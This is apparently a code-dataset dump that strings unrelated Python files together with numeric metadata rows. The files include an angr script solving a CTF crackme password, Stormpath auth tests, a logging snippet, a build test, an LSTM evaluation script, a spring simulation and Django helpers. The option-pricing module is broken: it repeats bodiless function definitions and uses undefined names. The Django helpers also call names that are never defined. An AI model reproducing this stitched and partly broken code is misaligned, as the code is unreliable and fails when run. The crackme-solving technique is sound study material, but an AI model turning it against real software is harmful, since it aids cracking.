| 35.920904 | 118 | 0.574394 | 748 | 6,358 | 4.707219 | 0.286096 | 0.030673 | 0.025845 | 0.029821 | 0.152798 | 0.140301 | 0.083499 | 0.06589 | 0.047146 | 0.022721 | 0 | 0.009564 | 0.325731 | 6,358 | 176 | 119 | 36.125 | 0.811756 | 0.219723 | 0 | 0.084337 | 0 | 0 | 0.016567 | 0 | 0 | 0 | 0 | 0.017045 | 0 | 1 | 0.096386 | false | 0 | 0.072289 | 0 | 0.240964 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
a183e429ab2df0bcb4079f035e2dd6d3cb6737a5 | 3,402 | py | Python | angr_ctf/solutions/06_angr_symbolic_dynamic_memory.py | Hamz-a/angr_playground | 8216f43bd2ec9a91c796a56bab610b119f8311cf | [
"MIT"
] | null | null | null | angr_ctf/solutions/06_angr_symbolic_dynamic_memory.py | Hamz-a/angr_playground | 8216f43bd2ec9a91c796a56bab610b119f8311cf | [
"MIT"
] | null | null | null | angr_ctf/solutions/06_angr_symbolic_dynamic_memory.py | Hamz-a/angr_playground | 8216f43bd2ec9a91c796a56bab610b119f8311cf | [
"MIT"
] | null | null | null | import angr
import claripy
path_to_bin = "../binaries/06_angr_symbolic_dynamic_memory"
# Find callback
def good_job(state):
# Get the output of the state
stdout = state.posix.dumps(1)
# If the program echo'ed "Good Job." then we've found a good state
return "Good Job." in str(stdout)
# Avoid callback
def try_again(state):
# Get the output of the state
stdout = state.posix.dumps(1)
# If the program echo'ed "Try again." then we found a state that we want to avoid
return "Try again." in str(stdout)
# Create an angr project
project = angr.Project(path_to_bin)
# Create the begin state starting from address 0x08048699 (see r2 output bellow)
# $ r2 -A 06_angr_symbolic_dynamic_memory
# [0x08048490]> pdf @main
# ┌ (fcn) main 395
# │ main (int argc, char **argv, char **envp);
# │ <REDACTED>
# │ 0x08048664 e8e7fdffff call sym.imp.memset ; void *memset(void *s, int c, size_t n)
# │ 0x08048669 83c410 add esp, 0x10
# │ 0x0804866c 83ec0c sub esp, 0xc
# │ 0x0804866f 682e880408 push str.Enter_the_password: ; 0x804882e ; "Enter the password: " ; const char *format
# │ 0x08048674 e877fdffff call sym.imp.printf ; int printf(const char *format)
# │ 0x08048679 83c410 add esp, 0x10
# │ 0x0804867c 8b15acc8bc0a mov edx, dword [obj.buffer1] ; [0xabcc8ac:4]=0
# │ 0x08048682 a1a4c8bc0a mov eax, dword [obj.buffer0] ; [0xabcc8a4:4]=0
# │ 0x08048687 83ec04 sub esp, 4
# │ 0x0804868a 52 push edx
# │ 0x0804868b 50 push eax
# │ 0x0804868c 6843880408 push str.8s__8s ; 0x8048843 ; "%8s %8s" ; const char *format
# │ 0x08048691 e8cafdffff call sym.imp.__isoc99_scanf ; int scanf(const char *format)
# │ 0x08048696 83c410 add esp, 0x10
# │ 0x08048699 c745f4000000. mov dword [local_ch], 0 ; <<< START HERE
# │ ┌─< 0x080486a0 eb64 jmp 0x8048706
entry_state = project.factory.blank_state(addr=0x08048699)
# Create a Symbolic BitVectors for each part of the password (64 bits per part %8s is used in scanf)
password_part0 = claripy.BVS("password_part0", 64)
password_part1 = claripy.BVS("password_part1", 64)
# Setup some heap space
entry_state.memory.store(0xabcc8a4, 0x4000000, endness=project.arch.memory_endness)
entry_state.memory.store(0xabcc8ac, 0x4000A00, endness=project.arch.memory_endness)
# Use the created heap and inject BVS
entry_state.memory.store(0x4000000, password_part0)
entry_state.memory.store(0x4000A00, password_part1)
# Create a simulation manager
simulation_manager = project.factory.simulation_manager(entry_state)
# Pass callbacks for states that we should find and avoid
simulation_manager.explore(avoid=try_again, find=good_job)
# If simulation manager has found a state
if simulation_manager.found:
found_state = simulation_manager.found[0]
# Get flag by solving the symbolic values using the found path
solution0 = found_state.solver.eval(password_part0, cast_to=bytes)
solution1 = found_state.solver.eval(password_part1, cast_to=bytes)
print("{} {}".format(solution0.decode("utf-8"), solution1.decode("utf-8")))
else:
print("No path found...") | 44.763158 | 131 | 0.663727 | 465 | 3,402 | 4.789247 | 0.415054 | 0.053435 | 0.026942 | 0.028738 | 0.160305 | 0.060171 | 0.060171 | 0.060171 | 0.060171 | 0.060171 | 0 | 0.138683 | 0.245444 | 3,402 | 76 | 132 | 44.763158 | 0.720686 | 0.614638 | 0 | 0.076923 | 0 | 0 | 0.094902 | 0.033725 | 0 | 0 | 0.050196 | 0 | 0 | 1 | 0.076923 | false | 0.230769 | 0.076923 | 0 | 0.230769 | 0.076923 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
a18aeadaf1c0a497b57a81c26b42e7ee05084e81 | 1,543 | py | Python | tests/live/test_client_auth.py | denibertovic/stormpath-sdk-python | e594a1bb48de3fa8eff26558bf4f72bb056e9d00 | [
"Apache-2.0"
] | null | null | null | tests/live/test_client_auth.py | denibertovic/stormpath-sdk-python | e594a1bb48de3fa8eff26558bf4f72bb056e9d00 | [
"Apache-2.0"
] | null | null | null | tests/live/test_client_auth.py | denibertovic/stormpath-sdk-python | e594a1bb48de3fa8eff26558bf4f72bb056e9d00 | [
"Apache-2.0"
] | null | null | null | """Live tests of client authentication against the Stormpath service API."""
from os import environ
from stormpath.client import Client
from stormpath.error import Error
from .base import LiveBase
class TestAuth(LiveBase):
def test_basic_authentication_succeeds(self):
client = Client(
id=self.api_key_id,
secret=self.api_key_secret,
scheme='basic')
# force the SDK to make a call to the server
list(client.applications)
def test_basic_authentication_fails(self):
client = Client(
id=self.api_key_id + 'x',
secret=self.api_key_secret + 'x',
scheme='basic')
# force the SDK to make a call to the server
with self.assertRaises(Error):
list(client.applications)
def test_digest_authentication_succeeds(self):
client = Client(
id=self.api_key_id,
secret=self.api_key_secret,
scheme='SAuthc1')
# force the SDK to make a call to the server
client.applications
def test_digest_authentication_fails(self):
client = Client(
id=self.api_key_id + 'x',
secret=self.api_key_secret + 'x',
scheme='SAuthc1')
# force the SDK to make a call to the server
with self.assertRaises(Error):
list(client.applications)
def test_load_from_environment_variables(self):
client = Client()
for app in client.applications:
self.assertTrue(app.href)
| 29.113208 | 76 | 0.628645 | 192 | 1,543 | 4.885417 | 0.265625 | 0.059701 | 0.085288 | 0.076759 | 0.690832 | 0.659915 | 0.620469 | 0.620469 | 0.620469 | 0.620469 | 0 | 0.001837 | 0.294232 | 1,543 | 52 | 77 | 29.673077 | 0.859504 | 0.157485 | 0 | 0.6 | 0 | 0 | 0.021689 | 0 | 0 | 0 | 0 | 0 | 0.085714 | 1 | 0.142857 | false | 0 | 0.114286 | 0 | 0.285714 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
a18bdd3e3f40a3f576715555ebb6a8270c24a370 | 256 | py | Python | languages/python/software_engineering_logging4.py | Andilyn/learntosolveit | fd15345c74ef543e4e26f4691bf91cb6dac568a4 | [
"BSD-3-Clause"
] | 136 | 2015-03-06T18:11:21.000Z | 2022-03-10T22:31:40.000Z | languages/python/software_engineering_logging4.py | Andilyn/learntosolveit | fd15345c74ef543e4e26f4691bf91cb6dac568a4 | [
"BSD-3-Clause"
] | 27 | 2015-01-07T01:38:03.000Z | 2021-12-22T19:20:15.000Z | languages/python/software_engineering_logging4.py | Andilyn/learntosolveit | fd15345c74ef543e4e26f4691bf91cb6dac568a4 | [
"BSD-3-Clause"
] | 1,582 | 2015-01-01T20:37:06.000Z | 2022-03-30T12:29:24.000Z | import logging
logger1 = logging.getLogger('package1.module1')
logger2 = logging.getLogger('package1.module2')
logging.basicConfig(level=logging.WARNING)
logger1.warning('This is a warning message')
logger2.warning('This is a another warning message')
| 23.272727 | 52 | 0.792969 | 32 | 256 | 6.34375 | 0.5 | 0.157635 | 0.236453 | 0.137931 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.034483 | 0.09375 | 256 | 10 | 53 | 25.6 | 0.840517 | 0 | 0 | 0 | 0 | 0 | 0.352941 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.166667 | 0 | 0.166667 | 0 | 0 | 0 | 0 | null | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
a18c81f3ba8e0a19564872357a93750676c04e10 | 862 | py | Python | py/foreman/tests/testdata/test_command/pkg1/build.py | clchiou/garage | 446ff34f86cdbd114b09b643da44988cf5d027a3 | [
"MIT"
] | 3 | 2016-01-04T06:28:52.000Z | 2020-09-20T13:18:40.000Z | py/foreman/tests/testdata/test_command/pkg1/build.py | clchiou/garage | 446ff34f86cdbd114b09b643da44988cf5d027a3 | [
"MIT"
] | null | null | null | py/foreman/tests/testdata/test_command/pkg1/build.py | clchiou/garage | 446ff34f86cdbd114b09b643da44988cf5d027a3 | [
"MIT"
] | null | null | null | from pathlib import Path
from foreman import define_parameter, rule, get_relpath
import foreman
if __name__ != 'pkg1':
raise AssertionError(__name__)
if not __file__.endswith('foreman/tests/testdata/test_command/pkg1/build.py'):
raise AssertionError(__file__)
relpath = get_relpath()
if relpath != Path('pkg1'):
raise AssertionError(relpath)
define_parameter('par1').with_derive(lambda ps: get_relpath())
@rule
@rule.depend('//pkg1/pkg2:rule2')
def rule1(parameters):
relpath = get_relpath()
if relpath != Path('pkg1'):
raise AssertionError(relpath)
par1 = parameters['par1']
if par1 != Path('pkg1'):
raise AssertionError(par1)
par2 = parameters['//pkg1/pkg2:par2']
if par2 != Path('pkg1/pkg2'):
raise AssertionError(par2)
# test_build() will check this
foreman._test_ran = True
| 21.02439 | 78 | 0.691415 | 105 | 862 | 5.419048 | 0.390476 | 0.200351 | 0.161687 | 0.142355 | 0.210896 | 0.210896 | 0.210896 | 0.210896 | 0.210896 | 0.210896 | 0 | 0.031206 | 0.182135 | 862 | 40 | 79 | 21.55 | 0.775887 | 0.032483 | 0 | 0.25 | 0 | 0 | 0.138221 | 0.058894 | 0 | 0 | 0 | 0 | 0.25 | 1 | 0.041667 | false | 0 | 0.125 | 0 | 0.166667 | 0 | 0 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
a190762c1566ca65105a3350c21b6933040e5549 | 2,362 | py | Python | scripts/option_normal_model.py | jcoffi/FuturesAndOptionsTradingSimulation | e02fdbe8c40021785a2a1dae56ff4b72f2d47c30 | [
"MIT"
] | 14 | 2017-02-16T15:13:53.000Z | 2021-05-26T11:34:09.000Z | scripts/option_normal_model.py | jcoffi/FuturesAndOptionsTradingSimulation | e02fdbe8c40021785a2a1dae56ff4b72f2d47c30 | [
"MIT"
] | null | null | null | scripts/option_normal_model.py | jcoffi/FuturesAndOptionsTradingSimulation | e02fdbe8c40021785a2a1dae56ff4b72f2d47c30 | [
"MIT"
] | 10 | 2016-08-05T07:37:07.000Z | 2021-11-26T17:31:48.000Z | #IMPORT log and sqrt FROM math MODULE
from math import log, sqrt, exp
#IMPORT date AND timedelta FOR HANDLING EXPIRY TIMES
from datetime import date, timedelta
#IMPORT SciPy stats MODULE
from scipy import stats
def asian_vol_factor(valDate,startDate,endDate):
#VALIDATE START DATE RELATIVE TO END DATE AND RETURN NO IMPACT IF ODD
if startDate > endDate: return 1
T = (endDate - valDate).days()
L = (endDate - startDate).days()
if days_to_expiry > avg_period_length:
return sqrt(((T - L + 1) * L ** 2 + L * (L - 1) * (2 * L - 1) / 6) / (L ** 2 * T))
else:
return sqrt((T + 1) * (2*T + 1) / (6 * L ** 2))
def F(z):
return (1/sqrt(2*pi)) * exp(-(z ** 2) / 2)
def option_price_normal(forward,strike,vol,rate,tenor,sign):
if vol == 0:
return sign * (forward - strike)
#sign = +1 for calls and -1 for puts
d1 = (forward - strike) / (vol * sqrt(tenor))
sameTerm = (vol * sqrt(tenor) * exp(-1*d1*d1/2)) / sqrt(2*3.141592653589793)
return exp(-1 * rate * tenor) * (sign * (forward - strike) * stats.norm.cdf(sign * d1) + sameTerm)
def option_price_normal(forward,strike,vol,rate,tenor,sign):
def option_price_normal(forward,strike,vol,rate,tenor,sign):
def option_price_normal(forward,strike,vol,rate,tenor,sign):
def option_implied_vol_normal(forward,strike,price,rate,tenor,sign):
#print 'imp vol calc:',forward,strike,price,rate,tenor,sign
price_err_limit = price/10000
iteration_limit = 20
vmax = 1.0 #START SEARCH FOR UPPER VOL BOUND AT 100%
tprice = 0
while option_price(forward,strike,vmax,rate,tenor,sign) < price:
vmax += 1
if vmax > iteration_limit: return -1 #ERROR CONDITION
#print 'vmax',vmax
vmin = vmax - 1
vmid = (vmin + vmax)/2
tprice = option_price(forward,strike,vmid,rate,tenor,sign)
count = 1
while abs(tprice - price) > price_err_limit:
if tprice > price:
vmax = vmid
else:
vmin = vmid
vmid = (vmin + vmax)/2
count = count + 1
if count > iteration_limit:
print 'option_implied_vol: search iter limit reached'
print forward,strike,price,rate,tenor,sign
return vmid #EXIT CONDITION
tprice = option_price_normal(forward,strike,vmid,rate,tenor,sign)
#print 'imp_vol = ',vmid
return vmid
| 38.721311 | 104 | 0.640559 | 346 | 2,362 | 4.283237 | 0.260116 | 0.114035 | 0.096491 | 0.080972 | 0.267881 | 0.25641 | 0.138327 | 0.138327 | 0.138327 | 0.138327 | 0 | 0.035595 | 0.238781 | 2,362 | 60 | 105 | 39.366667 | 0.788654 | 0.161727 | 0 | 0.212766 | 0 | 0 | 0.022854 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.06383 | null | null | 0.042553 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
a1946a453629c94f8bc3d4a45b2c968101db6df0 | 1,546 | py | Python | CatFaultDetection/LSTM/Test_LSTM.py | jonlwowski012/UGV-Wheel-Slip-Detection-Using-LSTM-and-DNN | 2af5dcf4c3b043f065f75b612a4bbfc4aa2d11e8 | [
"Apache-2.0"
] | null | null | null | CatFaultDetection/LSTM/Test_LSTM.py | jonlwowski012/UGV-Wheel-Slip-Detection-Using-LSTM-and-DNN | 2af5dcf4c3b043f065f75b612a4bbfc4aa2d11e8 | [
"Apache-2.0"
] | null | null | null | CatFaultDetection/LSTM/Test_LSTM.py | jonlwowski012/UGV-Wheel-Slip-Detection-Using-LSTM-and-DNN | 2af5dcf4c3b043f065f75b612a4bbfc4aa2d11e8 | [
"Apache-2.0"
] | null | null | null | import numpy as np
from scipy.misc import imread, imsave, imresize
from keras.models import model_from_json
from os.path import join
import matplotlib.pyplot as plt
import pandas as pd
import time
def shuffler(filename):
df = pd.read_csv(filename, header=0)
# return the pandas dataframe
return df.reindex(np.random.permutation(df.index))
num_classes = 4
# Read Dataset
data = pd.read_csv('../dataset/fault_dataset.csv')
data = shuffler('../dataset/fault_dataset.csv')
X = np.asarray(data[['posex','posey','orix','oriy','oriz','oriw']])
y_norm = np.asarray(data['labels'])
y = np.zeros((len(y_norm), num_classes))
y[np.arange(len(y_norm)), y_norm] = 1
# Define Paths and Variables
model_dir = 'model'
#%% Load model and weights separately due to error in keras
model = model_from_json(open(model_dir+"/model_weights.json").read())
model.load_weights(model_dir+"/model_weights.h5")
#%% Predict Output
t0 = time.time()
output_org = model.predict(np.reshape(X, (X.shape[0], 1, X.shape[1])))
print "Time to predict all ", len(X), " samples: ", time.time()-t0
print "Average time to predict a sample: ", (time.time()-t0)/len(X)
output = np.zeros_like(output_org)
output[np.arange(len(output_org)), output_org.argmax(1)] = 1
correct = 0
for i in range(len(output)):
if np.array_equal(output[i],y[i]):
correct += 1
print "Acc: ", correct/float(len(output))
output_index = []
for row in output:
output_index.append(np.argmax(row))
plt.plot(y_norm, color='red',linewidth=3)
plt.plot(output_index, color='blue', linewidth=1)
plt.show()
| 28.109091 | 70 | 0.721863 | 257 | 1,546 | 4.225681 | 0.40856 | 0.02302 | 0.035912 | 0.040516 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.011704 | 0.115783 | 1,546 | 54 | 71 | 28.62963 | 0.782736 | 0.09185 | 0 | 0 | 0 | 0 | 0.146638 | 0.040057 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.189189 | null | null | 0.081081 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
a194bf4b74105b49a6100082214a932f48fe4c3d | 3,304 | py | Python | examples/spring_system.py | tkoziara/parmec | fefe0586798cd65744334f9abeab183159bd3d7a | [
"MIT"
] | null | null | null | examples/spring_system.py | tkoziara/parmec | fefe0586798cd65744334f9abeab183159bd3d7a | [
"MIT"
] | 15 | 2017-06-09T12:05:27.000Z | 2018-10-25T13:59:58.000Z | examples/spring_system.py | parmes/parmec | fefe0586798cd65744334f9abeab183159bd3d7a | [
"MIT"
] | null | null | null | # find parmec path
import os, sys
def where(program):
for path in os.environ["PATH"].split(os.pathsep):
if os.path.exists(os.path.join(path, program)):
return path
return None
path = where('parmec4')
if path == None:
print 'ERROR: parmec4 not found in PATH!'
print ' Download and compile parmec;',
print 'add parmec directory to PATH variable;'
sys.exit(1)
print '(Found parmec4 at:', path + ')'
sys.path.append(os.path.join (path, 'python'))
from progress_bar import * # and import progress bar
from scipy import spatial # import scipy
import numpy as np # and numpy
# command line arguments
av = ARGV()
if '-h' in av or '--help' in av:
print 'Beam-like spring-system example:',
print 'cantilever beam fixed at x-far-end'
print 'Unit cubes interact via springs',
print 'connected within a radius of influence'
print 'Available arguments:'
print ' -nx int --> x resolution (or 10)'
print ' -ny int --> y resolution (or 5)'
print ' -nz int --> z resolution (or 5)'
print ' -du float --> duration (or 5.)'
print ' -st float --> time step (or auto)'
print ' -ra float --> spring influence radius (or 2.)'
print ' -h or --help --> print this help'
sys.exit(0)
# input parameters
nx = int(av[av.index('-nx')+1]) if '-nx' in av else 10
ny = int(av[av.index('-ny')+1]) if '-ny' in av else 5
nz = int(av[av.index('-nz')+1]) if '-nz' in av else 5
du = float(av[av.index('-du')+1]) if '-du' in av else 5.
st = float(av[av.index('-st')+1]) if '-st' in av else -1
ra = float(av[av.index('-ra')+1]) if '-ra' in av else 2.
# materials
matnum = MATERIAL (1E3, 1E9, 0.25)
spring = [-1,-1E6, 1,1E6]
dratio = 10.
# (nx,ny,nz) array of unit cubes
iend = nx*ny*nz-1
progress_bar(0, iend, 'Adding particles:')
x, y, z = np.mgrid[0:nx, 0:ny, 0:nz]
data = zip(x.ravel(), y.ravel(), z.ravel())
datarange = range (0, len(data))
for i in datarange:
p = data[i]
nodes = [p[0]-.5, p[1]-.5, p[2]-.5,
p[0]+.5, p[1]-.5, p[2]-.5,
p[0]+.5, p[1]+.5, p[2]-.5,
p[0]-.5, p[1]+.5, p[2]-.5,
p[0]-.5, p[1]-.5, p[2]+.5,
p[0]+.5, p[1]-.5, p[2]+.5,
p[0]+.5, p[1]+.5, p[2]+.5,
p[0]-.5, p[1]+.5, p[2]+.5]
elements = [8, 0, 1, 2, 3, 4, 5, 6, 7, matnum]
parnum = MESH (nodes, elements, matnum, 0)
progress_bar(i, iend, 'Adding particles:')
# connecting springs within radius
def add(a,b): return (a[0]+b[0],a[1]+b[1],a[2]+b[2])
def mul(a,b): return (a[0]*b,a[1]*b,a[2]*b)
progress_bar(0, iend, 'Adding springs:')
tree = spatial.KDTree(data)
for i in datarange:
p = data[i]
adj = tree.query_ball_point(np.array(p), ra)
for j in [k for k in adj if k < i]:
q = data[j]
x = mul(add(p,q),.5)
sprnum = SPRING (i, x, j, x, spring, dratio)
progress_bar(i, iend, 'Adding springs:')
# fixed at x-far-end
for i in datarange[-ny*nz:]:
RESTRAIN (i, [1,0,0,0,1,0,0,0,1], [1,0,0,0,1,0,0,0,1])
# gravity acceleration
GRAVITY (0., 0., -9.8)
# time step
hc = CRITICAL(perparticle=10)
if st < 0: st = 0.5 * hc[0][0]
# print out statistics
print '%dx%dx%d=%d particles and %d springs' % (nx,ny,nz,parnum,sprnum)
print '10 lowest-step per-particle tuples (critical step, particle index, circular frequency, damping ratio):'
print hc
print 'Running %d steps of size %g:' % (int(du/st),st)
# run simulation
DEM (du, st, (0.05, 0.01))
| 32.07767 | 110 | 0.608656 | 628 | 3,304 | 3.191083 | 0.269108 | 0.022954 | 0.011976 | 0.015968 | 0.138723 | 0.080838 | 0.06986 | 0.06986 | 0.04491 | 0.035928 | 0 | 0.056343 | 0.188862 | 3,304 | 102 | 111 | 32.392157 | 0.691418 | 0.0796 | 0 | 0.049383 | 0 | 0.012346 | 0.270654 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.049383 | null | null | 0.246914 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
a196cc5f96a8b93a3bb1cc5156a3a6b18c755ee7 | 9,491 | py | Python | apps/core/helpers.py | tarvitz/icu | 9a7cdac9d26ea224539f68f678b90bf70084374d | [
"BSD-3-Clause"
] | 1 | 2022-03-12T23:44:21.000Z | 2022-03-12T23:44:21.000Z | apps/core/helpers.py | tarvitz/icu | 9a7cdac9d26ea224539f68f678b90bf70084374d | [
"BSD-3-Clause"
] | null | null | null | apps/core/helpers.py | tarvitz/icu | 9a7cdac9d26ea224539f68f678b90bf70084374d | [
"BSD-3-Clause"
] | null | null | null | # coding: utf-8
#
import re
import os
from django.conf import settings
from django.shortcuts import (
render_to_response, get_object_or_404 as _get_object_or_404,
redirect)
from django.http import HttpResponse, HttpResponseRedirect
from django.template import RequestContext
from django.contrib.contenttypes.models import ContentType
from django.core.exceptions import ObjectDoesNotExist, MultipleObjectsReturned
from django.utils.translation import ugettext_lazy as _, ugettext as tr
from django.http import Http404
from datetime import datetime, time, date
import simplejson as json
def get_top_object_or_None(Object, *args, **kwargs):
if hasattr(Object, 'objects'):
obj = Object.objects.filter(*args, **kwargs)
else:
obj = Object.filter(*args, **kwargs)
if obj:
return obj[0]
return None
def get_object_or_None(Object, *args, **kwargs):
try:
return _get_object_or_404(Object, *args, **kwargs)
except (Http404, MultipleObjectsReturned):
return None
def get_object_or_404(Object, *args, **kwargs):
"""Retruns object or raise Http404 if it does not exist"""
try:
if hasattr(Object, 'objects'):
return Object.objects.get(*args, **kwargs)
elif hasattr(Object, 'get'):
return Object.get(*args, **kwargs)
else:
raise Http404("Giving object has no manager instance")
except (Object.DoesNotExist, Object.MultipleObjectReturned):
raise Http404("Object does not exist or multiple object returned")
def get_content_type(Object):
"""
works with ModelBase based classes, its instances
and with format string 'app_label.model_name', also supports
sphinx models and instances modification
source taken from warmist helpers source
retrieves content_type or raise the common django Exception
Examples:
get_content_type(User)
get_content_type(onsite_user)
get_content_type('auth.user')
"""
if callable(Object): # class
model = Object._meta.module_name
app_label = Object._meta.app_label
#model = Object.__name__.lower()
#app_label = (x for x in reversed(
# Object.__module__.split('.')) if x not in 'models').next()
elif hasattr(Object, 'pk'): # class instance
if hasattr(Object, '_sphinx') or hasattr(Object, '_current_object'):
model = Object._current_object._meta.module_name
app_label = Object._current_object._meta.app_label
#app_label = (x for x in reversed(
# Object._current_object.__module__.split('.')) \
#if x not in 'models').next()
#model = Object._current_object.__class__.__name__.lower()
else:
app_label = Object._meta.app_label
model = Object._meta.module_name
#app_label = (x for x in reversed(Object.__module__.split('.')) \
#if x not in 'models').next()
#model = Object.__class__.__name__.lower()
elif isinstance(Object, basestring):
app_label, model = Object.split('.')
ct = ContentType.objects.get(app_label=app_label, model=model)
return ct
def get_content_type_or_None(Object):
try:
return get_content_type(Object)
except:
return None
def get_content_type_or_404(Object):
try:
return get_content_type(Object)
except:
raise Http404
def get_form(app_label, form_name):
""" retrieve form within app_label and form_name given set"""
pass
def ajax_response(dt):
_errors = []
if 'errors' in dt:
for key in errors.keys():
_errors.append({'key': key, 'msg': errors[key]})
dt.update({'errors': _errors})
dt.update({'status': 200})
return dt
def generate_safe_value(value, regex):
if isinstance(regex, str):
regex = re.compile(regex, re.U | re.I)
match = regex.match(value or '')
if match:
return match.group()
return None
def make_http_response(**kw):
response = HttpResponse(status=kw.get('status', 200))
response['Content-Type'] = kw.get('content_type', 'text/plain')
if 'content' in kw:
response.write(kw['content'])
return response
def make_response(type='json', **kw):
response = HttpResponse(status=kw.get('status', 200))
if type in ('json', 'javascript', 'js'):
response['Content-Type'] = 'text/javascript'
else:
response['Content-Type'] = 'text/plain'
return response
def ajax_form_errors(errors):
""" returns form errors as python list """
errs = [{'key': k, 'msg': unicode(errors[k])} for k in errors.keys()]
#equivalent to
#for k in form.errors.keys():
# errors.append({'key': k, 'msg': unicode(form.errors[k])})
return errs
def paginate(Obj, page, **kwargs):
from django.core.paginator import InvalidPage, EmptyPage
from apps.core.diggpaginator import DiggPaginator as Paginator
pages = kwargs['pages'] if 'pages' in kwargs else 20
if 'pages' in kwargs:
del kwargs['pages']
paginator = Paginator(Obj, pages, **kwargs)
try:
objects = paginator.page(page)
except (InvalidPage, EmptyPage):
objects = paginator.page(1)
objects.count = pages # objects.end_index() - objects.start_index() +1
return objects
def model_json_encoder(obj, **kwargs):
from django.db.models.base import ModelState
from django.db.models import Model
from django.db.models.query import QuerySet
from decimal import Decimal
from django.db.models.fields.files import ImageFieldFile
is_human = kwargs.get('parse_humanday', False)
if isinstance(obj, QuerySet):
return list(obj)
elif isinstance(obj, Model):
dt = obj.__dict__
#obsolete better use partial
fields = ['_content_type_cache', '_author_cache', '_state']
for key in fields:
if key in dt:
del dt[key]
#normailize caches
disable_cache = kwargs['disable_cache'] \
if 'disable_cache' in kwargs else False
# disable cache if disable_cache given
for key in dt.keys():
if '_cache' in key and key.startswith('_'):
if not disable_cache:
dt[key[1:]] = dt[key]
#delete cache
del dt[key]
if disable_cache and '_cache' in key:
del dt[key]
#delete restriction fields
if kwargs.get('fields_restrict'):
for f in kwargs.get('fields_restrict'):
if f in dt:
del dt[f]
#make week more humanic
if is_human and 'week' in dt:
dt['week'] = unicode(humanday(dt['week']))
return dt
elif isinstance(obj, ModelState):
return 'state'
elif isinstance(obj, datetime):
return [
obj.year, obj.month, obj.day,
obj.hour, obj.minute, obj.second,
obj.isocalendar()[1]
]
elif isinstance(obj, date):
return [obj.year, obj.month, obj.day]
elif isinstance(obj, time):
return obj.strftime("%H:%M")
elif isinstance(obj, ImageFieldFile):
return obj.url if hasattr(obj, 'url') else ''
#elif isinstance(obj, Decimal):
# return float(obj)
return obj
def get_model_instance_json(Obj, id):
instance = get_object_or_None(Obj, id=id)
response = make_http_response(content_type='text/javascript')
if not instance:
response.write(json.dumps({
'success': False,
'error': unicode(_("Not found")),
}, default=model_json_encoder))
return response
response.write(json.dumps({
'success': True,
'instance': instance,
}, default=model_json_encoder))
return response
def create_path(path):
try:
os.stat(path)
except OSError, e:
if e.errno == 2:
os.makedirs(path)
else:
pass
return path
def get_safe_fields(lst, Obj):
""" excludes fields in given lst from Object """
return [
field.attname for field in Obj._meta.fields
if field.attname not in lst
]
#decorators
def render_to(template, content_type='text/html'):
def decorator(func):
def wrapper(request, *args, **kwargs):
dt = func(request, *args, **kwargs)
if 'redirect' in dt:
return redirect(dt['redirect'])
if content_type.lower() == 'text/html':
return render_to_response(
template,
dt,
context_instance=RequestContext(request))
elif content_type.lower() in ['text/json', 'text/javascript']:
response = HttpResponse()
response['Content-Type'] = content_type
tmpl = get_template(template)
response.write(tmpl.render(Context(dt)))
return response
else:
return render_to_response(
template,
dt, context_instance=RequestContext(request))
return wrapper
return decorator
def ajax_response(func):
def wrapper(request, *args, **kwargs):
dt = func(request, *args, **kwargs)
response = make_http_response(content_type='text/javascript')
response.write(json.dumps(dt, default=model_json_encoder))
return response
return wrapper
